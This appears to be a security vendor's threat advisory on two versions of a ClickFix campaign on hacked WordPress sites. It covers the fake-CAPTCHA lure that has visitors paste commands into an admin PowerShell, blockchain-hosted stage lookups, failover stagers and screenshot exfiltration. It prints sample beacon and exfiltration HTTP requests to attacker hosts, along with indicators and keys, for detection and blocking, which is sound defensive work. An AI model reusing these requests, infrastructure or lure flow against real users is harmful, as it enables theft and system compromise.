Two new iterations of the WP-002 ClickFix campaign surfaced on compromised WordPress sites in late September 2026. This page consolidates what both captures tell us — what changed, what it means for defenders, and what is still unknown.
Variant B (v16, freightbook365[.]com) upgraded the social engineering: instead of the non-elevated Win+R Run dialog used through v15, a Russian-localized fake Cloudflare Turnstile walks the visitor through Win+X → PowerShell (Admin) → paste → Enter, so whatever is pasted runs with administrator rights from the very first step. It also added a three-domain failover loader and a previously undocumented screenshot-exfiltration stage that photographs the visitor's page and posts it back to helauth[.]com on every visit — even when the clipboard poison itself is withheld.
Variant C (v17, gogreenlightloans[.]com) shows an operator under pressure. With its Cloudflare-fronted stagers publicly burned, the C2 moved to entry-verifed-cdn[.]codes resolving directly to 178.16.52.101 on the operator's own Spamhaus-DROP-listed AS202412. EtherHiding migrated from BSC-testnet to Polygon — and in the captured session the on-chain lookup failed, so the victim's clipboard received a harmless numeric string instead of a command.
Bottom line: the campaign is still live and still dangerous to visitors, but its delivery is visibly breaking down and its newest C2 is trivially blockable at the network edge.
dorz[.]nl waveasseload[.]com stager. Stager published to OTX/AbuseIPDB.freightbook365[.]comhelauth[.]com.gogreenlightloans[.]comReconstructed from embedded-keylog packet captures by independent TLS decryption — every stage below was observed on the wire, not inferred from a sandbox report.
Both lures are small-business sites on GoDaddy hosting. v16: RevSlider 6.7.16 + js_composer 7.8 (transcargo theme). v17: bankio-core theme + Elementor, Cloudflare-fronted.
An injected script asks a public blockchain RPC for its next stage. v16: BSC-testnet contract 0x5bc946cd…76f9c. v17: Polygon via polygon-bor-rpc.publicnode.com. Same function selector 0xe2179b8e in both — a strong continuity marker.
v16: cdn.js tries asseload → cfsubs → helauth in order, all Cloudflare-fronted. v17: a single self-hosted api.php on AS202412 with a base64-JSON beacon ({"action":"dl", k, os, vid, ref}).
JavaScript writes a PowerShell command into the visitor's clipboard. v16: XOR/base64 decoder (key qEXvNnc5bx0U), TDS-gated. v17: 658 KB obfuscator.io bundle that pulls the command on-chain.
Fake "verify you are human" overlay: Win+X → I (Terminal / PowerShell as Administrator) → Ctrl+V → Enter. No exploit is involved — the visitor runs the command themselves, with admin rights.
snap.js (html2canvas, 194 KB) renders the visitor's page to a JPEG and POSTs it as base64 to helauth[.]com/cdn/widget/shot, alongside a /hit fingerprint beacon. Fires regardless of TDS gating.
| Element | v15 · dorz.nl | v16 · Variant B | v17 · Variant C |
|---|---|---|---|
| Paste target | Win+R (non-elevated) | Win+X → PowerShell Admin | Win+X → PowerShell Admin |
| Lure locale | English | Russian | RU/EN |
| EtherHiding chain | BSC-testnet | BSC-testnet (new contract) | Polygon |
| Staging | single asseload | 3-domain failover | single self-hosted api.php |
| C2 hosting | 209.38.82.72:9048 | helauth[.]com (Cloudflare) | 178.16.52.101 — AS202412, DROP |
| Arming stage | XOR key oipCQd0DIbeF | XOR key qEXvNnc5bx0U | obfuscator.io, 658 KB |
| Screenshot exfil | — | Yes (html2canvas) | not observed |
| Delivery in capture | functional | TDS-gated / intermittent | failed (on-chain lookup error) |
0xe2179b8easseload primary failing/cdn/widget/shot as base64 JPEG| Type | Value | Role | Seen | Handling |
|---|---|---|---|---|
| domain | entry-verifed-cdn[.]codes | self-hosted api.php C2 | v17 | block |
| ipv4 | 178.16.52.101 | C2 host, AS202412 (DROP) | v17 | block |
| cidr | 178.16.52.0/24 | operator prefix serving C2 | v17 | block |
| domain | helauth[.]com | recon / screenshot-exfil C2 | v16 | block |
| domain | cfsubs[.]com | failover stager | v16 | block |
| domain | asseload[.]com | primary stager (burned) | v15–v16 | block |
| url | hxxps://helauth[.]com/cdn/widget/shot | screenshot exfil (POST) | v16 | alert |
| uri | /cdn/widget/{hit,shot,a/done} | beacon / exfil / poll | v16 | alert |
| string | a3946e3ded820e3d2f02885bf63c8a3a176d58bb9403b402 | api.php campaign key (k=/s=) | v17 | alert |
| contract | 0x5bc946cd5121431c7a43549aee7f567e15176f9c | EtherHiding (BSC-testnet) | v16 | track |
| domain | polygon-bor-rpc.publicnode.com | public RPC abused for EtherHiding | v17 | correlate only |
| domain | freightbook365[.]com | compromised lure | v16 | victim — notify |
| domain | gogreenlightloans[.]com | compromised lure | v17 | victim — notify |
The v16 domains resolve to shared Cloudflare edge addresses (104.21.29.209, 172.67.190.184, 104.21.59.52). Block those domains by name, not by IP — IP blocks would hit unrelated sites. Compromised lure sites are listed for notification and hunting only; please do not blocklist them.
| Hash | Artifact | Seen |
|---|---|---|
ba70a75c4b0d81e083fff510d0d6cc0c622cca3660cfa576e34ee899be7f72bc | cdn.js — failover loader | v16 |
c5ef6b9f44e97d55d6a0deac0ef22118410c3114e7b5b97f4fc1b5b0c5b4a1e9 | a4045c662b80.js — clipboard-arming stage | v16 |
e87e550794322e574a1fda0c1549a3c70dae5a93d9113417a429016838eab8cb | snap.js — html2canvas screenshotter | v16 |
51d4def852645a4f7a436abe7aa4498d08f57395e2f40e3c17cdb3f95d03f2d2 | obfuscator.io arming stage (658 KB) | v17 |
The two highest-value network discriminators, one per variant:
# Variant B — screenshot exfiltration POST /cdn/widget/shot?s=cdn:X&h=<lure-host> Host: helauth.com Content-Type: text/plain;charset=UTF-8 /9j/4AAQSkZJRg... <-- base64 JPEG of the visitor's page # Variant C — encoded beacon to DROP-listed infrastructure GET /api.php?k=a3946e3ded820e3d2f02885bf63c8a3a176d58bb9403b402&d=<base64-json> Host: entry-verifed-cdn.codes --> 178.16.52.101 (AS202412)
On endpoints, the shared behaviour across both variants is the most durable signal: an elevated PowerShell or Windows Terminal launched from explorer.exe via the Win+X menu that immediately runs a download cradle. In proxied web traffic, the injected lure markup (id="clipboard-text" alongside checkbox-container) catches visits even when the clipboard stage is gated off.
| Priority | Action |
|---|---|
| now | Block entry-verifed-cdn[.]codes, helauth[.]com, cfsubs[.]com, asseload[.]com and 178.16.52.0/24. If your policy allows, drop all of AS202412 — it is already on Spamhaus DROP. |
| now | Hunt for elevated PowerShell/Terminal spawned via Win+X running download cradles, especially on hosts that visited either lure site. |
| soon | Alert on /cdn/widget/shot base64-JPEG POSTs, /api.php requests carrying the campaign key, and the injected ClickFix DOM in web responses. |
| soon | User awareness: no legitimate CAPTCHA asks you to open Terminal or PowerShell and paste anything. Ever. |
| coord | Site owners of freightbook365.com and gogreenlightloans.com: your WordPress installs are compromised. Update or remove RevSlider, js_composer and Elementor add-ons, audit admin users, and check theme/footer files for injected script. |
The unified bundle supersedes the per-version v16 and v17 STIX files. YARA and Sigma rules remain available with each per-version advisory.
Attribution. Held strictly at the infrastructure level. SecureLeaf makes no named-group or nation-state assertion about this activity.
Splitcam rule. Compromised victim and lure sites are never blocklisted or reported as malicious — their owners are notified instead.
Provenance. Both chains were reconstructed by Dispensight / SecureLeaf from embedded-keylog packet captures via independent TLS decryption. The final clipboard command was not extracted in either capture; nothing on this page reproduces executable attacker code.
SL-ADV-2026-WP-001 · v16 + v17 consolidated · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com